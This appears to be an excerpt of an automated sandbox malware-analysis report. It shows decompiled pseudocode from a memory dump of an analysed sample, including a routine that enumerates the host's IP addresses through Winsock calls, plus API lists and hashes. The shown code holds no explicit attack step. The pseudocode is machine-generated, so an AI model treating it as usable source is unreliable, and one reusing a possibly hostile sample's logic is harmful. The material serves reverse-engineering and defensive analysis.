                          • Instruction Fuzzy Hash: 30212872A1420AAFCF24DFACCD05EAE77E8EF5462CF108619E90493680D731F904C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E012F6980(void* __ebx, intOrPtr* __ecx, signed int __edi, signed int _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				char _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int* _v72;
                          				char _v76;
                          				intOrPtr* _v80;
                          				char _v84;
                          				signed int _v88;
                          				signed int* _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				short _v144;
                          				signed int _v148;
                          				intOrPtr* _v168;
                          				char _v172;
                          				signed int _v180;
                          				intOrPtr* _v268;
                          				signed int _v280;
                          				char _v288;
                          				signed int _v292;
                          				intOrPtr _v296;
                          				char _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				short _v324;
                          				signed int _v556;
                          				signed int _v560;
                          				signed int _v564;
                          				intOrPtr* _v728;
                          				signed int _v732;
                          				intOrPtr _v736;
                          				intOrPtr _v740;
                          				signed int _v744;
                          				char _v760;
                          				char _v988;
                          				intOrPtr* _v992;
                          				intOrPtr* _v996;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t278;
                          				signed int _t279;
                          				void* _t281;
                          				signed int _t312;
                          				signed int _t313;
                          				intOrPtr* _t315;
                          				void* _t316;
                          				void* _t318;
                          				void* _t319;
                          				signed int _t324;
                          				signed int _t326;
                          				signed int _t327;
                          				signed int _t328;
                          				signed int _t334;
                          				signed int _t342;
                          				signed int _t350;
                          				signed int _t353;
                          				signed int _t356;
                          				signed int _t357;
                          				signed int _t361;
                          				int _t367;
                          				signed int _t368;
                          				signed int _t371;
                          				signed int _t372;
                          				intOrPtr _t378;
                          				signed int _t379;
                          				signed int _t383;
                          				intOrPtr _t384;
                          				signed int _t386;
                          				signed int _t389;
                          				signed int _t401;
                          				signed int _t411;
                          				signed int _t414;
                          				intOrPtr _t421;
                          				signed int _t429;
                          				void* _t431;
                          				signed int _t432;
                          				intOrPtr* _t449;
                          				signed int _t459;
                          				signed int _t471;
                          				char _t481;
                          				signed int _t486;
                          				signed int _t496;
                          				signed int _t503;
                          				intOrPtr* _t504;
                          				intOrPtr _t506;
                          				signed int _t508;
                          				signed int _t509;
                          				signed int* _t510;
                          				signed int _t511;
                          				signed int* _t513;
                          				signed int _t515;
                          				void* _t516;
                          				intOrPtr _t518;
                          				void* _t519;
                          				signed int _t520;
                          				signed int _t521;
                          				signed int _t522;
                          				intOrPtr* _t523;
                          				void* _t524;
                          				void* _t525;
                          				signed int _t527;
                          				signed int _t529;
                          				signed int _t530;
                          				signed int _t531;
                          				void* _t532;
                          				signed int _t533;
                          				void* _t535;
                          				void* _t536;
                          				signed int _t538;
                          				void* _t540;
                          				void* _t541;
                          
                          				_t503 = __edi;
                          				_t431 = __ecx;
                          				_push(0xffffffff);
                          				_push(0x13655ad);
                          				_push( *[fs:0x0]);
                          				_t533 = _t532 - 0x40;
                          				_t278 =  *0x13a4018; // 0x39cca9f6
                          				_t279 = _t278 ^ _t529;
                          				_v20 = _t279;
                          				_push(__ebx);
                          				_push(__edi);
                          				_push(_t279);
                          				 *[fs:0x0] =  &_v16;
                          				_t281 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				_v48 = _t281;
                          				asm("movq [ebp-0x28], xmm0");
                          				_v36 = 0;
                          				_v80 = _t281;
                          				_v44 = 0;
                          				_v40 = 0;
                          				_v36 = 0;
                          				_v8 = 0;
                          				asm("movq [ebp-0x1c], xmm0");
                          				_v24 = 0;
                          				_v76 = __ecx;
                          				_v72 =  &_v44;
                          				_v32 = 0;
                          				_v28 = 0;
                          				_v24 = 0;
                          				_v8 = 1;
                          				_push( &_v68);
                          				asm("movq [ebp-0x40], xmm0");
                          				_v60 = 0;
                          				L65();
                          				_v8 = 2;
                          				_t515 = _v68;
                          				_t429 = _v64;
                          				if(_t515 == _t429) {
                          					L7:
                          					_t515 = _v32;
                          					_t503 = _v28;
                          					if(_t515 == _t503) {
                          						L14:
                          						_t504 = _v80;
                          						_t432 = 0;
                          						_v44 = 0;
                          						 *_t504 = _v44;
                          						 *((intOrPtr*)(_t504 + 4)) = _v40;
                          						_t286 = _v36;
                          						 *((intOrPtr*)(_t504 + 8)) = _v36;
                          						_v40 = 0;
                          						_v36 = 0;
                          						if(_v68 != 0) {
                          							_t486 = _t429;
                          							_t429 = _v68;
                          							_push(0);
                          							E012F5650(_t429, _t486);
                          							_push((0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2) + ((0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2)) * 2 << 3);
                          							_t286 = E012F56A0(_t429, _t504, _t429);
                          							_t432 = _v44;
                          							_t533 = _t533 + 0xc;
                          							_t515 = _v32;
                          						}
                          						if(_t515 != 0) {
                          							E012F8900(_t286, _t429, _t515, _v28, _t504, _t432);
                          							_push(_v24 - _v32 & 0xfffffff8);
                          							E012F56A0(_t429, _t504, _v32);
                          							_t432 = _v44;
                          							_t533 = _t533 + 0xc;
                          							_v32 = 0;
                          							_v28 = 0;
                          							_v24 = 0;
                          						}
                          						if(_t432 != 0) {
                          							_push(_t432);
                          							E012F5650(_t432, _v40);
                          							_push((0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2)) * 2 << 3);
                          							E012F56A0(_t429, _t504, _v44);
                          						}
                          						 *[fs:0x0] = _v16;
                          						_pop(_t516);
                          						return E0132EA79(_v20 ^ _t529, _t516);
                          					} else {
                          						do {
                          							if( *((intOrPtr*)(_t515 + 4)) == 0) {
                          								goto L12;
                          							} else {
                          								if( *((intOrPtr*)(_t515 + 4)) == GetCurrentThreadId()) {
                          									_push(5);
                          									E01316F3B(_t429, _t515);
                          									goto L22;
                          								} else {
                          									_t421 = E013174F5(_t431,  *_t515,  *((intOrPtr*)(_t515 + 4)), 0);
                          									_t533 = _t533 + 0xc;
                          									if(_t421 != 0) {
                          										goto L24;
                          									} else {
                          										 *_t515 = _t421;
                          										 *((intOrPtr*)(_t515 + 4)) = _t421;
                          										goto L12;
                          									}
                          								}
                          							}
                          							goto L87;
                          							L12:
                          							_t515 = _t515 + 8;
                          						} while (_t515 != _t503);
                          						_t515 = _v32;
                          						goto L14;
                          					}
                          				} else {
                          					while(1) {
                          						_v48 = 0;
                          						_t431 =  &_v48;
                          						E012F8C00(_t431,  &_v76, _t515);
                          						_v8 = 3;
                          						_t481 = E01349877(_t431, 0, 0, E012F8C80, _v48, 0,  &_v52);
                          						_t533 = _t533 + 0x1c;
                          						_v56 = _t481;
                          						if(_t481 == 0) {
                          							break;
                          						}
                          						_v8 = 4;
                          						_t431 = _v28;
                          						if(_t431 == _v24) {
                          							_t431 =  &_v32;
                          							E012F82F0(_t431, _t503, _t431,  &_v56);
                          						} else {
                          							asm("xorps xmm0, xmm0");
                          							asm("movlpd [ebp-0x34], xmm0");
                          							 *_t431 = _t481;
                          							 *((intOrPtr*)(_t431 + 4)) = _v52;
                          							_v28 = _v28 + 8;
                          						}
                          						_v8 = 2;
                          						if(_v52 != 0) {
                          							L22:
                          							E01349908(_t429, _t431, _t481, _t503, __eflags);
                          							break;
                          						} else {
                          							_t515 = _t515 + 0x18;
                          							if(_t515 != _t429) {
                          								continue;
                          							} else {
                          								goto L7;
                          							}
                          						}
                          						goto L87;
                          					}
                          					_push(6);
                          					_v52 = 0;
                          					E01316F3B(_t429, _t515);
                          					L24:
                          					_push(2);
                          					E01316F3B(_t429, _t515);
                          					asm("int3");
                          					asm("int3");
                          					_push(_t529);
                          					_t530 = _t533;
                          					_push(0xffffffff);
                          					_push(0x136561b);
                          					_push( *[fs:0x0]);
                          					_t535 = _t533 - 0x98;
                          					_t312 =  *0x13a4018; // 0x39cca9f6
                          					_t313 = _t312 ^ _t530;
                          					_v104 = _t313;
                          					_push(_t515);
                          					_push(_t503);
                          					_push(_t313);
                          					 *[fs:0x0] =  &_v100;
                          					_v172 = _t431;
                          					_t315 = _v80;
                          					_t449 = _t315;
                          					_v180 = 0;
                          					_v168 = _t315;
                          					_t506 =  *((intOrPtr*)(_t315 + 0x14));
                          					_t518 =  *((intOrPtr*)(_t315 + 0x10));
                          					__eflags = _t506 - 8;
                          					if(_t506 >= 8) {
                          						_t449 =  *_t315;
                          					}
                          					_push(_v100);
                          					_t316 = E012F86C0(_t429, _t449, _t518, _t506, _t449, ".", 1);
                          					_t536 = _t535 + 0x10;
                          					__eflags = _t316 - 0xffffffff;
                          					if(_t316 == 0xffffffff) {
                          						L63:
                          						 *[fs:0x0] = _v20;
                          						_pop(_t519);
                          						__eflags = _v24 ^ _t530;
                          						return E0132EA79(_v24 ^ _t530, _t519);
                          					} else {
                          						_v68 = 0;
                          						_t318 = _t316 + 1;
                          						_v84 = 0;
                          						_t455 = _v88;
                          						__eflags = _t518 - _t318;
                          						_v64 = 7;
                          						_t319 =  <  ? _t518 : _t318;
                          						__eflags = _t506 - 8;
                          						_t508 = _v88;
                          						if(_t506 >= 8) {
                          							_t455 =  *_t508;
                          						}
                          						_push(_t319);
                          						E012F51B0(_t429,  &_v84, _t508, _t518, _t455);
                          						_v108 = 1;
                          						_t520 = 1;
                          						_v12 = 0;
                          						_v104 = 1;
                          						do {
                          							E012F8010(_t429,  &_v172, _t520, _t508);
                          							asm("movups xmm0, [ebp-0xa4]");
                          							_v108 = _v108 | 0x00000006;
                          							asm("movups [ebp-0x88], xmm0");
                          							asm("movq xmm0, [ebp-0x94]");
                          							asm("movq [ebp-0x78], xmm0");
                          							_v12 = 1;
                          							E012F8070( &_v60,  &_v84,  &_v144);
                          							_t536 = _t536 + 4;
                          							_v12 = 3;
                          							_t324 = _v124;
                          							__eflags = _t324 - 8;
                          							if(_t324 >= 8) {
                          								_push(2 + _t324 * 2);
                          								E012F56A0(_t429, _t508, _v144);
                          								_t536 = _t536 + 8;
                          							}
                          							_v128 = 0;
                          							_t492 =  &_v60;
                          							_v124 = 7;
                          							_t459 = _t508;
                          							_v144 = 0;
                          							_t326 = E012F8130();
                          							__eflags = _t326;
                          							if(_t326 == 0) {
                          								goto L58;
                          							} else {
                          								_t334 = E012F72A0(_t429, _t508,  &_v60, _t508);
                          								__eflags = _t334;
                          								if(_t334 == 0) {
                          									goto L58;
                          								} else {
                          									_v28 = 0;
                          									asm("xorps xmm0, xmm0");
                          									asm("movq [ebp-0x1c], xmm0");
                          									E012F7400(_t429, _t508,  &_v36,  &_v60);
                          									_v12 = 4;
                          									_t509 = _v36;
                          									_t521 = _v32;
                          									__eflags = _t509 - _t521;
                          									if(_t509 == _t521) {
                          										L42:
                          										_t510 = E012F7710(_t429, _t509,  &_v120,  &_v60);
                          										__eflags =  &_v36 - _t510;
                          										if( &_v36 == _t510) {
                          											_t342 = _v28;
                          										} else {
                          											__eflags = _v36;
                          											if(_v36 != 0) {
                          												_t527 = _v36;
                          												_push(_t459);
                          												E012F5650(_t527, _t521);
                          												_t492 = 0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2;
                          												_t411 = (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2) + ((0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2)) * 2 << 3;
                          												__eflags = _t411;
                          												_push(_t411);
                          												E012F56A0(_t429, _t510, _t527);
                          												_t536 = _t536 + 0xc;
                          											}
                          											_t521 = _t510[1];
                          											_v36 =  *_t510;
                          											_t342 = _t510[2];
                          											_v32 = _t521;
                          											_v28 = _t342;
                          											 *_t510 = 0;
                          											_t510[1] = 0;
                          											_t510[2] = 0;
                          										}
                          										_t459 = _v120;
                          										_v96 = _t342;
                          										__eflags = _t459;
                          										if(_t459 != 0) {
                          											_push(_t459);
                          											E012F5650(_t459, _v116);
                          											_t459 = _v112 - _v120;
                          											_t492 = 0x2aaaaaab * _t459 >> 0x20 >> 2;
                          											_t401 = (0x2aaaaaab * _t459 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t459 >> 0x20 >> 2) + ((0x2aaaaaab * _t459 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t459 >> 0x20 >> 2)) * 2 << 3;
                          											__eflags = _t401;
                          											_push(_t401);
                          											E012F56A0(_t429, _t510, _v120);
                          											_t521 = _v32;
                          											_t536 = _t536 + 0xc;
                          											_v120 = 0;
                          											_v116 = 0;
                          											_v112 = 0;
                          										}
                          										_t509 = _v36;
                          										__eflags = _t509 - _t521;
                          										if(_t509 == _t521) {
                          											L55:
                          											_t511 = _v36;
                          											__eflags = _t511;
                          											if(_t511 != 0) {
                          												_push(_t459);
                          												E012F5650(_t511, _t521);
                          												_t350 = (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2) + ((0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2)) * 2 << 3;
                          												__eflags = _t350;
                          												_push(_t350);
                          												E012F56A0(_t429, _t511, _t511);
                          												_t536 = _t536 + 0xc;
                          												_v36 = 0;
                          												_v32 = 0;
                          												_v28 = 0;
                          											}
                          											_t508 = _v88;
                          											_t520 = _v104;
                          											goto L58;
                          										} else {
                          											while(1) {
                          												_t522 =  *_v92;
                          												_v148 = _t522;
                          												_t353 = E01317416(_t522);
                          												_t538 = _t536 + 4;
                          												__eflags = _t353;
                          												if(_t353 != 0) {
                          													goto L64;
                          												}
                          												_v12 = 6;
                          												_push(_t509);
                          												_t389 = _v92[1];
                          												_v100 = _t389;
                          												_t459 =  *(_t389 + 4);
                          												__eflags = _t459 -  *((intOrPtr*)(_t389 + 8));
                          												if(_t459 ==  *((intOrPtr*)(_t389 + 8))) {
                          													_push(_t459);
                          													_t459 = _t389;
                          													E012F8140(_t459, _t509);
                          												} else {
                          													E012F60E0(_t429, _t459, _t492, _t509);
                          													 *((intOrPtr*)(_v100 + 4)) =  *((intOrPtr*)(_v100 + 4)) + 0x18;
                          												}
                          												_v12 = 4;
                          												E0131743B(_t522);
                          												_t521 = _v32;
                          												_t509 = _t509 + 0x18;
                          												_t536 = _t538 + 4;
                          												__eflags = _t509 - _t521;
                          												if(_t509 != _t521) {
                          													continue;
                          												} else {
                          													goto L55;
                          												}
                          												goto L87;
                          											}
                          											goto L64;
                          										}
                          									} else {
                          										while(1) {
                          											_t522 =  *_v92;
                          											_v100 = _t522;
                          											_t353 = E01317416(_t522);
                          											_t538 = _t536 + 4;
                          											__eflags = _t353;
                          											if(_t353 != 0) {
                          												break;
                          											}
                          											_v12 = 5;
                          											_push(_t509);
                          											_t414 = _v92[1];
                          											_v96 = _t414;
                          											_t459 =  *(_t414 + 4);
                          											__eflags = _t459 -  *((intOrPtr*)(_t414 + 8));
                          											if(_t459 ==  *((intOrPtr*)(_t414 + 8))) {
                          												_push(_t459);
                          												_t459 = _t414;
                          												E012F8140(_t459, _t509);
                          											} else {
                          												E012F60E0(_t429, _t459, _t492, _t509);
                          												 *((intOrPtr*)(_v96 + 4)) =  *((intOrPtr*)(_v96 + 4)) + 0x18;
                          											}
                          											_v12 = 4;
                          											E0131743B(_t522);
                          											_t521 = _v32;
                          											_t509 = _t509 + 0x18;
                          											_t536 = _t538 + 4;
                          											__eflags = _t509 - _t521;
                          											if(_t509 != _t521) {
                          												continue;
                          											} else {
                          												goto L42;
                          											}
                          											goto L87;
                          										}
                          										L64:
                          										E01316F0E(_t429, _t459, _t492, _t509, _t522);
                          										asm("int3");
                          										asm("int3");
                          										_t531 = _t538;
                          										_t356 =  *0x13a4018; // 0x39cca9f6
                          										_t357 = _t356 ^ _t531;
                          										_v292 = _t357;
                          										 *[fs:0x0] =  &_v288;
                          										_t523 = _v268;
                          										asm("xorps xmm0, xmm0");
                          										asm("movq [ebp-0x120], xmm0");
                          										_v556 = 0;
                          										_v992 = _t523;
                          										_v996 = _t523;
                          										_v564 = 0;
                          										_v560 = 0;
                          										_v556 = 0;
                          										_v280 = 0;
                          										E013478D0(_t509,  &_v988, 0, 0x190);
                          										_t540 = _t538 - 0x2e0 + 0xc;
                          										_t361 =  &_v988;
                          										__imp__#115(0x202, _t361, _t357, _t509, _t522,  *[fs:0x0], 0x1365676, 0xffffffff, _t530, _t353);
                          										__eflags = _t361;
                          										if(_t361 == 0) {
                          											E013478D0(_t509,  &_v288, _t361, 0x104);
                          											_t541 = _t540 + 0xc;
                          											_t367 = gethostname( &_v288, 0x104);
                          											__eflags = _t367 - 0xffffffff;
                          											if(_t367 != 0xffffffff) {
                          												_t368 =  &_v288;
                          												__imp__#52(_t368);
                          												_v732 = _t368;
                          												__eflags = _t368;
                          												if(_t368 != 0) {
                          													_t513 =  *(_t368 + 0xc);
                          													_t525 = 0;
                          													__eflags =  *((short*)(_t368 + 0xa)) - 1;
                          													if( *((short*)(_t368 + 0xa)) - 1 > 0) {
                          														while(1) {
                          															_t371 =  *_t513;
                          															__eflags = _t371;
                          															if(_t371 == 0) {
                          																goto L84;
                          															}
                          															_t513 =  &(_t513[1]);
                          															__imp__#12( *_t371);
                          															_t496 = _t371;
                          															__eflags = _t496;
                          															if(_t496 != 0) {
                          																_t233 = _t371 + 1; // 0x1
                          																_v744 = 0;
                          																_v740 = 0xf;
                          																_v760 = 0;
                          																_v736 = _t233;
                          																do {
                          																	_t471 =  *_t371;
                          																	_t371 = _t371 + 1;
                          																	__eflags = _t471;
                          																} while (_t471 != 0);
                          																_push(_t371 - _v736);
                          																E012F7F00(_t429,  &_v760, _t496, _t513, _t496);
                          																_v16 = 1;
                          																E012F6730(_t429,  &_v324,  &_v760, _t513);
                          																_v16 = 3;
                          																_t378 = _v740;
                          																__eflags = _t378 - 0x10;
                          																if(_t378 >= 0x10) {
                          																	_t386 = _t378 + 1;
                          																	__eflags = _t386;
                          																	_push(_t386);
                          																	E012F56A0(_t429, _t513, _v760);
                          																	_t541 = _t541 + 8;
                          																}
                          																__eflags = _v308;
                          																_v744 = 0;
                          																_v740 = 0xf;
                          																_v760 = 0;
                          																if(_v308 == 0) {
                          																	L80:
                          																	_t379 = _v304;
                          																} else {
                          																	_t383 = E012F72A0(_t429, _t513,  &_v324,  &_v324);
                          																	__eflags = _t383;
                          																	if(_t383 == 0) {
                          																		goto L80;
                          																	} else {
                          																		_t384 = _v296;
                          																		__eflags = _t384 - _v292;
                          																		if(_t384 == _v292) {
                          																			_push( &_v324);
                          																			E012F54C0(_t429,  &_v300, _t513, _t525, _t384);
                          																			goto L80;
                          																		} else {
                          																			 *(_t384 + 0x10) = 0;
                          																			 *(_t384 + 0x14) = 0;
                          																			asm("movups xmm0, [ebp-0x138]");
                          																			asm("movups [eax], xmm0");
                          																			asm("movq xmm0, [ebp-0x128]");
                          																			asm("movq [eax+0x10], xmm0");
                          																			_t379 = 7;
                          																			_v296 = _v296 + 0x18;
                          																			_v308 = 0;
                          																			_v304 = 7;
                          																			_v324 = 0;
                          																		}
                          																	}
                          																}
                          																_v16 = 0;
                          																__eflags = _t379 - 8;
                          																if(_t379 >= 8) {
                          																	_push(2 + _t379 * 2);
                          																	E012F56A0(_t429, _t513, _v324);
                          																	_t541 = _t541 + 8;
                          																}
                          															}
                          															_t372 = _v732;
                          															_t525 = _t525 + 1;
                          															__eflags = _t525 -  *((short*)(_t372 + 0xa)) - 1;
                          															if(_t525 <  *((short*)(_t372 + 0xa)) - 1) {
                          																continue;
                          															}
                          															goto L84;
                          														}
                          													}
                          													L84:
                          													_t523 = _v728;
                          												}
                          											}
                          											__imp__#116();
                          										}
                          										 *_t523 = _v300;
                          										 *((intOrPtr*)(_t523 + 4)) = _v296;
                          										 *(_t523 + 8) = _v292;
                          										 *[fs:0x0] = _v24;
                          										_pop(_t524);
                          										__eflags = _v28 ^ _t531;
                          										return E0132EA79(_v28 ^ _t531, _t524);
                          									}
                          								}
                          							}
                          							goto L87;
                          							L58:
                          							_v12 = 0;
                          							_t327 = _v40;
                          							__eflags = _t327 - 8;
                          							if(_t327 >= 8) {
                          								_push(2 + _t327 * 2);
                          								E012F56A0(_t429, _t508, _v60);
                          								_t536 = _t536 + 8;
                          							}
                          							_t520 = _t520 + 1;
                          							_v104 = _t520;
                          							__eflags = _t520 - 0xfe;
                          						} while (_t520 <= 0xfe);
                          						_t328 = _v64;
                          						__eflags = _t328 - 8;
                          						if(_t328 >= 8) {
                          							_push(2 + _t328 * 2);
                          							E012F56A0(_t429, _t508, _v84);
                          						}
                          						goto L63;
                          					}
                          				}
                          				L87:
                          			}

                          APIs
                            • Part of subcall function 012F6FE0: WSAStartup.WS2_32(00000202,?), ref: 012F7078
                            • Part of subcall function 012F6FE0: gethostname.WS2_32(?,00000104), ref: 012F70A7
                            • Part of subcall function 012F6FE0: gethostbyname.WS2_32(?), ref: 012F70BD
                            • Part of subcall function 012F6FE0: inet_ntoa.WS2_32(?), ref: 012F70F2
                          • GetCurrentThreadId.KERNEL32 ref: 012F6ACA
                          • std::_Throw_Cpp_error.LIBCPMT ref: 012F6BEF
                          • std::_Throw_Cpp_error.LIBCPMT ref: 012F6C02
                          • std::_Throw_Cpp_error.LIBCPMT ref: 012F6C09
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Cpp_errorThrow_std::_$CurrentStartupThreadgethostbynamegethostnameinet_ntoa
                          • String ID:
                          • API String ID: 4025713785-0
                          • Opcode ID: 5196b45b117bdbab1c9599285848e37957ca95238ce871bb206dc1dde50b0c41
                          • Instruction ID: f5adbe90bada48aa1a3c8f5e602158efdabf56ce404bf8fa67636e72ce1c4e2d
                          • Opcode Fuzzy Hash: 5196b45b117bdbab1c9599285848e37957ca95238ce871bb206dc1dde50b0c41
                          • Instruction Fuzzy Hash: A48169B1D1020A9FDB18DFA8C851BEEFBB4EF58314F14822DE615B7280D7756A44CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E01301940(void* __ebx, intOrPtr __ecx, signed int _a4, signed int _a8) {
                          				intOrPtr _v8;
                          				signed short _v12;
                          				void* __esi;
                          				void* __ebp;
                          				signed short _t60;
                          				void* _t61;
                          				void* _t65;
                          				signed int _t67;
                          				signed short _t68;
                          				signed int _t72;
                          				signed int _t74;
                          				void* _t75;
                          				signed int _t77;
                          				signed int _t78;
                          				signed short _t81;
                          				intOrPtr _t86;
                          				void* _t88;
                          				signed int _t96;
                          				intOrPtr _t98;
                          				intOrPtr _t102;
                          				signed int _t103;
                          				signed char* _t106;
                          				signed int _t108;
                          				signed int _t110;
                          				unsigned int _t115;
                          				signed short _t117;
                          				void* _t123;
                          
                          				_push(__ecx);
                          				_t102 = __ecx;
                          				_v8 = __ecx;
                          				if(( *(__ecx + 8) & 0x00000100) == 0) {
                          					_t115 = _a4 & 0x0000ffff;
                          					_t108 = _a8 & 0x0000ffff;
                          				} else {
                          					_t81 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + 4)))) + 0x20))();
                          					_t115 = _t81 & 0x0000ffff;
                          					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 4)))) + 0x20))(_a8, _a4);
                          					_t102 = _v8;
                          					_t108 = _t60 & 0x0000ffff;
                          				}
                          				_t86 =  *((intOrPtr*)(_t102 + 4));
                          				if(_t115 > _t108) {
                          					L25:
                          					return _t60;
                          				} else {
                          					while(1) {
                          						_t60 = E01302180(_t102);
                          						if(_t108 >= _t60) {
                          							break;
                          						}
                          						_t98 =  *((intOrPtr*)(_t86 + 0x18));
                          						_t127 = _t98;
                          						if(_t98 == 0) {
                          							_t78 = E0132EA8A(_t115, _t127, 0x20);
                          							asm("xorps xmm0, xmm0");
                          							_a4 = _t78;
                          							_t123 = _t123 + 4;
                          							_t98 = _t78;
                          							asm("movups [eax], xmm0");
                          							asm("movups [eax+0x10], xmm0");
                          							 *((intOrPtr*)(_t86 + 0x18)) = _t78;
                          						}
                          						_t77 = _t115 & 0x00000007;
                          						_t106 = (_t115 >> 3) + _t98;
                          						_t115 = _t115 + 1;
                          						asm("bts ecx, eax");
                          						 *_t106 =  *_t106 & 0x000000ff;
                          						_t102 = _v8;
                          						if(_t115 <= _t108) {
                          							continue;
                          						} else {
                          							return _t77;
                          						}
                          						goto L31;
                          					}
                          					__eflags = _t108 - _t115;
                          					if(_t108 < _t115) {
                          						goto L25;
                          					} else {
                          						_t61 = E01302190(_t102);
                          						__eflags = _t108 - _t115 - _t61;
                          						if(_t108 - _t115 >= _t61) {
                          							_t96 =  *(_t86 + 0x20);
                          							_a4 = _t96;
                          							__eflags = _t96;
                          							if(__eflags == 0) {
                          								_t74 = E0132EA8A(_t115, __eflags, 0xc);
                          								_a4 = _t74;
                          								_t123 = _t123 + 4;
                          								_t96 = _t74;
                          								_a4 = _t74;
                          								 *_t74 = 0;
                          								 *((intOrPtr*)(_t74 + 4)) = 0;
                          								 *((intOrPtr*)(_t74 + 8)) = 0;
                          								 *(_t86 + 0x20) = _t74;
                          							}
                          							_t103 =  *(_t96 + 4);
                          							__eflags =  *_t96 - _t103;
                          							if( *_t96 > _t103) {
                          								L20:
                          								 *( *(_t96 + 8) + _t103 * 2) = _t115;
                          								 *(_t96 + 4) =  *(_t96 + 4) + 1;
                          								_t115 =  *(_t86 + 0x20);
                          								_t96 =  *(_t115 + 4);
                          								__eflags =  *_t115 - _t96;
                          								if( *_t115 > _t96) {
                          									L24:
                          									_t60 =  *(_t115 + 8);
                          									 *(_t60 + _t96 * 2) = _t108;
                          									_t53 = _t115 + 4;
                          									 *_t53 =  *(_t115 + 4) + 1;
                          									__eflags =  *_t53;
                          									goto L25;
                          								} else {
                          									_t45 = _t96 + 0x10; // 0x10
                          									_t88 = _t45;
                          									__eflags = _t88 - 0x7fffffff;
                          									if(_t88 > 0x7fffffff) {
                          										goto L28;
                          									} else {
                          										_push(_t88 + _t88);
                          										_push( *(_t115 + 8));
                          										_t67 = E01349C40();
                          										_t123 = _t123 + 8;
                          										__eflags = _t67;
                          										if(__eflags == 0) {
                          											goto L29;
                          										} else {
                          											_t96 =  *(_t115 + 4);
                          											 *(_t115 + 8) = _t67;
                          											 *_t115 = _t88;
                          											goto L24;
                          										}
                          									}
                          								}
                          							} else {
                          								_t31 = _t103 + 0x10; // 0x17
                          								_t68 = _t31;
                          								_a8 = _t68;
                          								__eflags = _t68 - 0x7fffffff;
                          								if(_t68 > 0x7fffffff) {
                          									E012F4A60();
                          									goto L27;
                          								} else {
                          									_push(_t68 + _t68);
                          									_push( *(_t96 + 8));
                          									_t72 = E01349C40();
                          									_t123 = _t123 + 8;
                          									__eflags = _t72;
                          									if(__eflags == 0) {
                          										L27:
                          										E01316BCF(__eflags);
                          										L28:
                          										E012F4A60();
                          										L29:
                          										E01316BCF(__eflags);
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										asm("int3");
                          										_push(_t115);
                          										_t117 = _v12;
                          										_push(_t108);
                          										_t110 =  *(_t96 + 4);
                          										_t65 = E013020E0(_t96, _t110, _t117, _v8);
                          										_t58 = _t110 + 0x24;
                          										 *_t58 =  *(_t110 + 0x24) | _t117;
                          										__eflags =  *_t58;
                          										return _t65;
                          									} else {
                          										_t96 = _a4;
                          										_t103 =  *(_t96 + 4);
                          										 *(_t96 + 8) = _t72;
                          										 *_t96 = _a8;
                          										goto L20;
                          									}
                          								}
                          							}
                          						} else {
                          							do {
                          								_push(_t115);
                          								_t75 = E01301C70(_t102);
                          								_t102 = _v8;
                          								_t115 = _t115 + 1;
                          								__eflags = _t115 - _t108;
                          							} while (_t115 <= _t108);
                          							return _t75;
                          						}
                          					}
                          				}
                          				L31:
                          			}

                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01301ACD
